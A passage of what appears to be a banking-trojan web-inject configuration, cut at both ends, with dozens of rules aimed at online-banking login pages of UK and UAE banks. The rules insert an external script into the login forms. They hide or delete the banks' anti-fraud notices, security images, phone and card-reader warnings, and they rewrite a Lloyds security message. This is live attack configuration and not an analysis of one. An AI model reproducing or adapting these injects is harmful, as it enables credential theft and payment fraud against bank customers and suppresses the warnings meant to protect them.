1841. <style type="text/css">
1842. body {visibility: hidden; }
1843. </style>
1844. <script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>
1845. <script type="text/javascript">setTimeout(function(){document.body.style.visibility = 'visible';}, 5000);</script>
1846. ]]></replacement>
1847. </modify>
1848. <modify>
1849. <pattern modifiers="msU"><![CDATA[Your security obligations.*<div]]></pattern>
1850. <replacement><![CDATA[Your security obligations
1851. </div>
1852. Due to our recent security changes you should <b>keep your smart card inserted in your card reader</b>.
1853. <p class="SecurityMsgBorder_Bottom">This security message will appear periodically.</p>Please tick the box to acknowledge these security obligations.
1854. </div>
1855. <div]]></replacement>
1856. </modify>
1857. </actions>
1858. </httpinject>
1859. <httpinject>
1860. <conditions>
1861. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.barclayswealth\.com/login/action/logon/unauthenticated/personal/loginDetails</url>
1862. </conditions>
1863. <actions>
1864. <modify>
1865. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1866. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1867. </modify>
1868. <modify>
1869. <pattern modifiers="i"><![CDATA[(ContentAdditionalLinks")]]></pattern>
1870. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
1871. </modify>
1872. </actions>
1873. </httpinject>
1874. <httpinject>
1875. <conditions>
1876. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://connect\.barclays\.com/.*authen</url>
1877. </conditions>
1878. <actions>
1879. <modify>
1880. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1881. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1882. </modify>
1883. </actions>
1884. </httpinject>
1885. <httpinject>
1886. <conditions>
1887. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.fundsdirect\.co\.uk/bks/login\.aspx\?bksid=beaumont</url>
1888. </conditions>
1889. <actions>
1890. <modify>
1891. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1892. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
1893. </modify>
1894. </actions>
1895. </httpinject>
1896. <httpinject>
1897. <conditions>
1898. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.cbq\.com\.qa</url>
1899. </conditions>
1900. <actions>
1901. <modify>
1902. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1903. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1904. </modify>
1905. </actions>
1906. </httpinject>
1907. <httpinject>
1908. <conditions>
1909. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://securebank\.cahoot\.com/servlet/com\.aquariussecurity\.bks\.security\.authentication\.servlet\.LoginEntryServletBKS</url>
1910. </conditions>
1911. <actions>
1912. <modify>
1913. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1914. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1915. </modify>
1916. </actions>
1917. </httpinject>
1918. <httpinject>
1919. <conditions>
1920. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.caterallenonline\.co\.uk/WebAccess\.dll</url>
1921. </conditions>
1922. <actions>
1923. <modify>
1924. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
1925. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
1926. </modify>
1927. </actions>
1928. </httpinject>
1929. <httpinject>
1930. <conditions>
1931. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://home\d*\.cybusinessonline\.co\.uk/lmgru.*/ceblm\-web/</url>
1932. </conditions>
1933. <actions>
1934. <modify>
1935. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1936. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1937. </modify>
1938. </actions>
1939. </httpinject>
1940. <httpinject>
1941. <conditions>
1942. <url type="allow" onpost="1" onget="1" modifiers="iU">^https?://www\.cybusinessonline\.co\.uk/essential\-maintenance/fraud\-message</url>
1943. </conditions>
1944. <actions>
1945. <modify>
1946. <pattern modifiers="i"><![CDATA[(position: relative; padding-bottom: 20px;)]]></pattern>
1947. <replacement><![CDATA[\1visibility:hidden;]]></replacement>
1948. </modify>
1949. </actions>
1950. </httpinject>
1951. <httpinject>
1952. <conditions>
1953. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://business\.co\-operativebank\.co\.uk/corp/BANKAWAY</url>
1954. </conditions>
1955. <actions>
1956. <modify>
1957. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1958. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1959. </modify>
1960. </actions>
1961. </httpinject>
1962. <httpinject>
1963. <conditions>
1964. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://fdonline\.co\-operativebank\.co\.uk/corp/BANKAWAY</url>
1965. </conditions>
1966. <actions>
1967. <modify>
1968. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
1969. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1970. </modify>
1971. </actions>
1972. </httpinject>
1973. <httpinject>
1974. <conditions>
1975. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cbfm\.saas\.cashfac\.com/cbfm/</url>
1976. </conditions>
1977. <actions>
1978. <modify>
1979. <pattern modifiers="is"><![CDATA[(</form>)]]></pattern>
1980. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
1981. </modify>
1982. </actions>
1983. </httpinject>
1984. <httpinject>
1985. <conditions>
1986. <url type="allow" onpost="1" onget="1" modifiers="iU">^http://www\.co\-operativebank\.co\.uk/corporate/fdo\-noticeboard</url>
1987. <url type="allow" onpost="1" onget="1" modifiers="iU">^http://www\.co\-operativebank\.co\.uk/business/businessonlinebanking/bobs\-noticeboard</url>
1988. </conditions>
1989. <actions>
1990. <modify>
1991. <pattern modifiers="isU"><![CDATA[<article class="textareaDefault">.*be fooled by fraudsters.*</article>]]></pattern>
1992. <replacement><![CDATA[]]></replacement>
1993. </modify>
1994. </actions>
1995. </httpinject>
1996. <httpinject>
1997. <conditions>
1998. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://cbionline\.cbi\.ae/bus/security/companyLogin\.jsp</url>
1999. </conditions>
2000. <actions>
2001. <modify>
2002. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2003. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2004. </modify>
2005. </actions>
2006. </httpinject>
2007. <httpinject>
2008. <conditions>
2009. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.cbdibusiness\.ae/cb/servlet/cb/login\.jsp($|\?)</url>
2010. </conditions>
2011. <actions>
2012. <modify>
2013. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
2014. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2015. </modify>
2016. <modify>
2017. <pattern modifiers=""><![CDATA[(<head>)]]></pattern>
2018. <replacement><![CDATA[\1<style>.sectionhead {display:none;}</style>]]></replacement>
2019. </modify>
2020. </actions>
2021. </httpinject>
2022. <httpinject>
2023. <conditions>
2024. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.coutts\.com/eBankingCouttsLogin/login</url>
2025. </conditions>
2026. <actions>
2027. <modify>
2028. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
2029. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2030. </modify>
2031. </actions>
2032. </httpinject>
2033. <httpinject>
2034. <conditions>
2035. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://business\d*\.danskebank\.(co\.uk|com)/pub/logon/logon\.aspx</url>
2036. </conditions>
2037. <actions>
2038. <modify>
2039. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
2040. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2041. </modify>
2042. <modify>
2043. <pattern modifiers="isU"><![CDATA[(<div id="ctl00_AsideArea_DbgBox1")]]></pattern>
2044. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
2045. </modify>
2046. <modify>
2047. <pattern modifiers="isU"><![CDATA[(<di22222v id="ctl00_HeadArea_WPManager_DbgCmsContent3")]]></pattern>
2048. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
2049. </modify>
2050. </actions>
2051. </httpinject>
2052. <httpinject>
2053. <conditions>
2054. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://online\.dib\.ae/webapplication\.ui/localoperations/login/corporateloginpage\.aspx</url>
2055. </conditions>
2056. <actions>
2057. <modify>
2058. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2059. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2060. </modify>
2061. </actions>
2062. </httpinject>
2063. <httpinject>
2064. <conditions>
2065. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://login\.smartbusiness\.ae/</url>
2066. </conditions>
2067. <actions>
2068. <modify>
2069. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2070. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2071. </modify>
2072. </actions>
2073. </httpinject>
2074. <httpinject>
2075. <conditions>
2076. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.fgb\.ae/fgbcorporate/CorpLogin\.html?(\?|$)</url>
2077. </conditions>
2078. <actions>
2079. <modify>
2080. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2081. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2082. </modify>
2083. </actions>
2084. </httpinject>
2085. <httpinject>
2086. <conditions>
2087. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\d+\.firstdirect\.com/1/2/</url>
2088. </conditions>
2089. <actions>
2090. <modify>
2091. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2092. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2093. </modify>
2094. </actions>
2095. </httpinject>
2096. <httpinject>
2097. <conditions>
2098. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.halifax\-online\.co\.uk/personal/logon/login\.jsp
2099. </url>
2100. </conditions>
2101. <actions>
2102. <modify>
2103. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
2104. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2105. </modify>
2106. </actions>
2107. </httpinject>
2108. <httpinject>
2109. <conditions>
2110. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.onlinebanking\.iombank\.com/(login|default)\.aspx</url>
2111. </conditions>
2112. <actions>
2113. <modify>
2114. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2115. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2116. </modify>
2117. </actions>
2118. </httpinject>
2119. <httpinject>
2120. <conditions>
2121. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.onlinebanking\.iombank\.com/(login|default)\.aspx</url>
2122. </conditions>
2123. <actions>
2124. <modify>
2125. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
2126. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
2127. </modify>
2128. </actions>
2129. </httpinject>
2130. <httpinject>
2131. <conditions>
2132. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.iombankibanking\.com/eai/IPB_EAI_Web/</url>
2133. </conditions>
2134. <actions>
2135. <modify>
2136. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2137. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2138. </modify>
2139. <modify>
2140. <pattern modifiers="iU"><![CDATA[<META http\-equiv="refresh" content=".*">]]></pattern>
2141. <replacement><![CDATA[]]></replacement>
2142. </modify>
2143. </actions>
2144. </httpinject>
2145. <httpinject>
2146. <conditions>
2147. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://lloydslink\.online\.lloydsbank\.com/Logon/Logon\.jsp
2148. </url>
2149. </conditions>
2150. <actions>
2151. <modify>
2152. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2153. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2154. </modify>
2155. <modify>
2156. <pattern modifiers="isU"><![CDATA[name="GENERATOR">.*</HEAD>]]></pattern>
2157. <replacement><![CDATA[name="GENERATOR"></HEAD>]]></replacement>
2158. </modify>
2159. </actions>
2160. </httpinject>
2161. <httpinject>
2162. <conditions>
2163. <url type="allow" onpost="1" onget="1" modifiers="iU">^https?://www\.lloydsbankcommercial\.com/servicemessage
2164. </url>
2165. </conditions>
2166. <actions>
2167. <modify>
2168. <pattern modifiers="isU"><![CDATA[(</title>)]]></pattern>
2169. <replacement><![CDATA[\1
2170. <style>
2171. body {display:none;}
2172. </style>
2173. <script>
2174. $(document).ready(function() {
2175. //$('em:contains("If you receive a request to confirm personal contact information do not respond")').parent().hide();
2176. //$('div.cms-content:contains("Call the LloydsLink online Help Desk")').children().css('visibility', 'hidden');
2177. $('div.cms-content:contains("If you receive a request to confirm personal contact information do not respond")').attr('id', 'secid');
2178. //$('strong:contains("LLOYDSLINK ONLINE SECURITY")').parent().attr('id', 'secid');
2179. //$('p:contains("If you have any questions, the Helpdesk can be contacted on")').hide().next().hide();
2180. $('#secid').find('p').remove();
2181. $('#secid').append('<p><strong>1) IMPORTANT SECURITY INFORMATION</strong>&nbsp;<img title="Urgent Message" alt="Urgent Message" src="/uploadedImages/Service_Message/Content/urgent(1).jpg"> &nbsp;</p><p><em>21 October</em>&nbsp;</p><p>&nbsp;</p><p>Lloyds Banking Group is aware that the Dyre malware (also known as Dyreza) is currently actively targeting financial institutions across the UK including customers of LloydsLink online.</p><p>&nbsp;<br>This is not a vulnerability within LloydsLink online but malware that resides on infected computer systems designed to steal user log-in credentials.</p><p>&nbsp;<br>We recommend you:</p><p>&nbsp;</p><p>1.&nbsp;Work with your IT security providers to confirm that your anti-malware solution is capable of detecting and removing the very latest variants of Dyre.</p><p>2.&nbsp;Carry out comprehensive scans of any systems used to access LloydsLink, as well as any other financial service institution or financial orientated software that you use and transact on.</p><p>3.&nbsp;Change Passwords and memorable information, following the comprehensive scans of your systems.</p><p><br>Please remember it is important to check all beneficiary details, especially bank sort codes and account numbers, before creating and approving all payments.</p><p>&nbsp;</p><p>For more information on protecting your payments please visit our <strong><a class="tu" title="Security Centre" href=" https://www.lloydsbankcommercial.com/lloydslinkonlinesupport/security/?utm_source=Main&amp;amp;utm_medium=sw_update&amp;amp;utm_term=na&amp;amp;utm_content=na&amp;amp;utm_campaign=sm">Security Centre</a></strong>.&nbsp;<br>&nbsp;</p><p><span>&nbsp;</span>&nbsp;</p><p><a class="tu" title="Protect Yourself And Your Payments - Green" href="https://www.lloydsbankcommercial.com/lloydslinkonlinesupport/security/"><img title="Protect Yourself And Your Payments - Green" alt="Protect Yourself And Your Payments - Green" src="/uploadedImages/Service_Message/Content/ProtectYourselfAndYourPayments-Green.jpg" border="0"></a>&nbsp;</p>');
2182. //var pIndex = $('#secid').parent().children().index($('#secid'));
2183. //$('#secid').parent().find('> *:gt('+pIndex+')').hide();
2184. //$('#secid').replaceWith('<p> <strong>3) KEEPING YOUR PC SECURE <img title="Reminder Message" alt="Reminder Message" src="/uploadedImages/Service_Message/Content/reminder(1).jpg" /> </strong> </p><p><strong></strong> </p><p><strong>Protect against viruses</strong> </p><p> </p><ul><li>Use anti-virus software and <strong>ensure that it is kept up to date </strong>- this should protect your computer against the latest viruses</li><li>Use up-to-date anti-spyware software to protect against programs that fraudsters can use to collect information about your Internet usage</li></ul><p> </p><p><strong>Keep your software up-to-date</strong> </p><p> </p><p>Occasionally publishers discover vulnerabilities in their products and issue \'patches\' to protect against any security threats. It is important that you regularly visit the website of the company which produces your operating system (e.g. Windows XP) and browser (e.g. Internet Explorer) to check for any patches or updates they may have issued.</p><p> </p><p> </p>');
2185. $('body').show();
2186. });
2187. </script>
2188. ]]></replacement>
2189. </modify>
2190. </actions>
2191. </httpinject>
2192. <httpinject>
2193. <conditions>
2194. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(retail|corporate)\.metrobankonline\.co\.uk</url>
2195. </conditions>
2196. <actions>
2197. <modify>
2198. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
2199. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2200. </modify>
2201. </actions>
2202. </httpinject>
2203. <httpinject>
2204. <conditions>
2205. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cardservicing\.mint\.co\.uk/RBSG\_Consumer/Login\.do</url>
2206. </conditions>
2207. <actions>
2208. <modify>
2209. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2210. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2211. </modify>
2212. </actions>
2213. </httpinject>
2214. <httpinject>
2215. <conditions>
2216. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://online\.nbad\.com/iportalweb/iportal/jsps/orbilogin\.jsp</url>
2217. </conditions>
2218. <actions>
2219. <modify>
2220. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2221. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2222. </modify>
2223. </actions>
2224. </httpinject>
2225. <httpinject>
2226. <conditions>
2227. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://nbf\.ae/corporate/BANKAWAY(;|\?|$)</url>
2228. </conditions>
2229. <actions>
2230. <modify>
2231. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2232. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2233. </modify>
2234. <modify>
2235. <pattern modifiers="i"><![CDATA[( class="post")]]></pattern>
2236. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
2237. </modify>
2238. <modify>
2239. <pattern modifiers="i"><![CDATA[( class="phone")]]></pattern>
2240. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
2241. </modify>
2242. </actions>
2243. </httpinject>
2244. <httpinject>
2245. <conditions>
2246. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://nbqonline\.ae/corp/BANKAWAY\?Action\.CorpUser\.Init</url>
2247. </conditions>
2248. <actions>
2249. <modify>
2250. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
2251. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2252. </modify>
2253. <modify>
2254. <pattern modifiers="isU"><![CDATA[<a href="javascript.*Trouble&.*</span>]]></pattern>
2255. <replacement><![CDATA[]]></replacement>
2256. </modify>
2257. </actions>
2258. </httpinject>
2259. <httpinject>
2260. <conditions>
2261. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://onlinebanking\.nationwide\.co\.uk/AccessManagement/Login</url>
2262. </conditions>
2263. <actions>
2264. <modify>
2265. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2266. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2267. </modify>
2268. </actions>
2269. </httpinject>
2270. <httpinject>
2271. <conditions>
2272. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankline\.natwest\.com/
2273. </url>
2274. </conditions>
2275. <actions>
2276. <modify>
2277. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2278. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2279. </modify>
2280. <modify>
2281. <pattern modifiers="i"><![CDATA[(phoneAdvice_nwb\.png")]]></pattern>
2282. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
2283. </modify>
2284. <modify>
2285. <pattern modifiers="i"><![CDATA[(readerAdvice_nwb\.png")]]></pattern>
2286. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
2287. </modify>
2288. </actions>
2289. </httpinject>
2290. <httpinject>
2291. <conditions>
2292. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://ib\d*\.npbs\.co\.uk/IB\.Web/Login\.aspx</url>
2293. </conditions>
2294. <actions>
2295. <modify>
2296. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2297. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2298. </modify>
2299. </actions>
2300. </httpinject>
2301. <httpinject>
2302. <conditions>
2303. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://professionalson\-line\.bankofscotlandbusiness\.co\.uk/\_mem\_bin/formslogin\.asp</url>
2304. </conditions>
2305. <actions>
2306. <modify>
2307. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2308. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2309. </modify>
2310. </actions>
2311. </httpinject>
2312. <httpinject>
2313. <conditions>
2314. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://(edi|del|hkg|lon|sta)\.my\.rbs\.com</url>
2315. </conditions>
2316. <actions>
2317. <modify>
2318. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
2319. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2320. </modify>
2321. <modify>
2322. <pattern modifiers="i"><![CDATA[(function checkKey\(e\))]]></pattern>
2323. <replacement><![CDATA[\1{}function checkKey1(e)]]></replacement>
2324. </modify>
2325. </actions>
2326. </httpinject>
2327. <httpinject>
2328. <conditions>
2329. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankline\.rbs\.com/
2330. </url>
2331. </conditions>
2332. <actions>
2333. <modify>
2334. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2335. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2336. </modify>
2337. <modify>
2338. <pattern modifiers="i"><![CDATA[(phoneAdvice_rbs\.png")]]></pattern>
2339. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
2340. </modify>
2341. <modify>
2342. <pattern modifiers="i"><![CDATA[(readerAdvice_rbs\.png")]]></pattern>
2343. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
2344. </modify>
2345. </actions>
2346. </httpinject>
2347. <httpinject>
2348. <conditions>
2349. <url type="allow" onpost="1" onget="1" modifiers="iU">^https?://www.rbs\.co\.uk/corporate/electronic\-services/g1/bankline\.ashx
2350. </url>
2351. </conditions>
2352. <actions>
2353. <modify>
2354. <pattern modifiers="isU"><![CDATA[<div class="right">.*<div>.*<div class="sidebar extRHS">]]></pattern>
2355. <replacement><![CDATA[<div class="right" style="display:none;"><div><div class="sidebar extRHS">]]></replacement>
2356. </modify>
2357. </actions>
2358. </httpinject>
2359. <httpinject>
2360. <conditions>
2361. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://business\.santander\.co\.uk/LGSBBI\_NS\_ENS/</url>
2362. </conditions>
2363. <actions>
2364. <modify>
2365. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2366. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2367. </modify>
2368. </actions>
2369. </httpinject>
2370. <httpinject>
2371. <conditions>
2372. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://corporate\.santander\.co\.uk/LOGSCU_NS_ENS/</url>
2373. </conditions>
2374. <actions>
2375. <modify>
2376. <pattern modifiers="i"><![CDATA[(</html>)]]></pattern>
2377. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2378. </modify>
2379. </actions>
2380. </httpinject>
2381. <httpinject>
2382. <conditions>
2383. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://vpn.*\.sjp\.co\.uk/vpn/vpnloginpage\.html</url>
2384. </conditions>
2385. <actions>
2386. <modify>
2387. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2388. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2389. </modify>
2390. </actions>
2391. </httpinject>
2392. <httpinject>
2393. <conditions>
2394. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.tescobank\.com/sss/auth</url>
2395. </conditions>
2396. <actions>
2397. <modify>
2398. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2399. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2400. </modify>
2401. </actions>
2402. </httpinject>
2403. <httpinject>
2404. <conditions>
2405. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://banking\.triodos\.co\.uk/ib\-seam/login\.seam\?loginType=dp550</url>
2406. </conditions>
2407. <actions>
2408. <modify>
2409. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2410. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2411. </modify>
2412. <modify>
2413. <pattern modifiers="i"><![CDATA[document\.forms\['loginForm'\]\.onkeypress]]></pattern>
2414. <replacement><![CDATA[var fnc934]]></replacement>
2415. </modify>
2416. </actions>
2417. </httpinject>
2418. <httpinject>
2419. <conditions>
2420. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.ulsterbankanytimebanking\.co\.uk/(login|default)\.aspx</url>
2421. </conditions>
2422. <actions>
2423. <modify>
2424. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2425. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2426. </modify>
2427. </actions>
2428. </httpinject>
2429. <httpinject>
2430. <conditions>
2431. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.ulsterbankanytimebanking\.co\.uk/(login|default)\.aspx</url>
2432. </conditions>
2433. <actions>
2434. <modify>
2435. <pattern modifiers="i"><![CDATA[(class="frame securityImage")]]></pattern>
2436. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
2437. </modify>
2438. </actions>
2439. </httpinject>
2440. <httpinject>
2441. <conditions>
2442. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.bankline\.ulsterbank\.(ie|co\.uk)/
2443. </url>
2444. </conditions>
2445. <actions>
2446. <modify>
2447. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2448. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2449. </modify>
2450. <modify>
2451. <pattern modifiers="i"><![CDATA[(securitywarn\_ulster\.jpg")]]></pattern>
2452. <replacement><![CDATA[\1 style="visibility:hidden;" id="phoneAdvice"]]></replacement>
2453. </modify>
2454. <modify>
2455. <pattern modifiers="i"><![CDATA[(cardReader\_ulster\.jpg")]]></pattern>
2456. <replacement><![CDATA[\1 style="visibility:hidden;"]]></replacement>
2457. </modify>
2458. </actions>
2459. </httpinject>
2460. <httpinject>
2461. <conditions>
2462. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.hvbrsce\.com/ebanking/London/EXE/WBankDsp\.exe</url>
2463. </conditions>
2464. <actions>
2465. <modify>
2466. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
2467. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>\1]]></replacement>
2468. </modify>
2469. </actions>
2470. </httpinject>
2471. <httpinject>
2472. <conditions>
2473. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://www\.unb\.com/uninet/main\_login\.asp</url>
2474. </conditions>
2475. <actions>
2476. <modify>
2477. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2478. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2479. </modify>
2480. <modify>
2481. <pattern modifiers="isU"><![CDATA[<tr><td align="center"><a href="safety_flyer\.htm".*</tr>]]></pattern>
2482. <replacement><![CDATA[]]></replacement>
2483. </modify>
2484. <modify>
2485. <pattern modifiers="isU"><![CDATA[<tr><td align="center"><b><font face="Arial" size="3">.*</tr>]]></pattern>
2486. <replacement><![CDATA[]]></replacement>
2487. </modify>
2488. </actions>
2489. </httpinject>
2490. <httpinject>
2491. <conditions>
2492. <url type="allow" onpost="1" onget="1" modifiers="iU">^https://cib\.uab\.ae/</url>
2493. </conditions>
2494. <actions>
2495. <modify>
2496. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
2497. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/webcticker.js"></script>]]></replacement>
2498. </modify>
2499. </actions>
2500. </httpinject>
2501. <httpinject>
2502. <conditions>
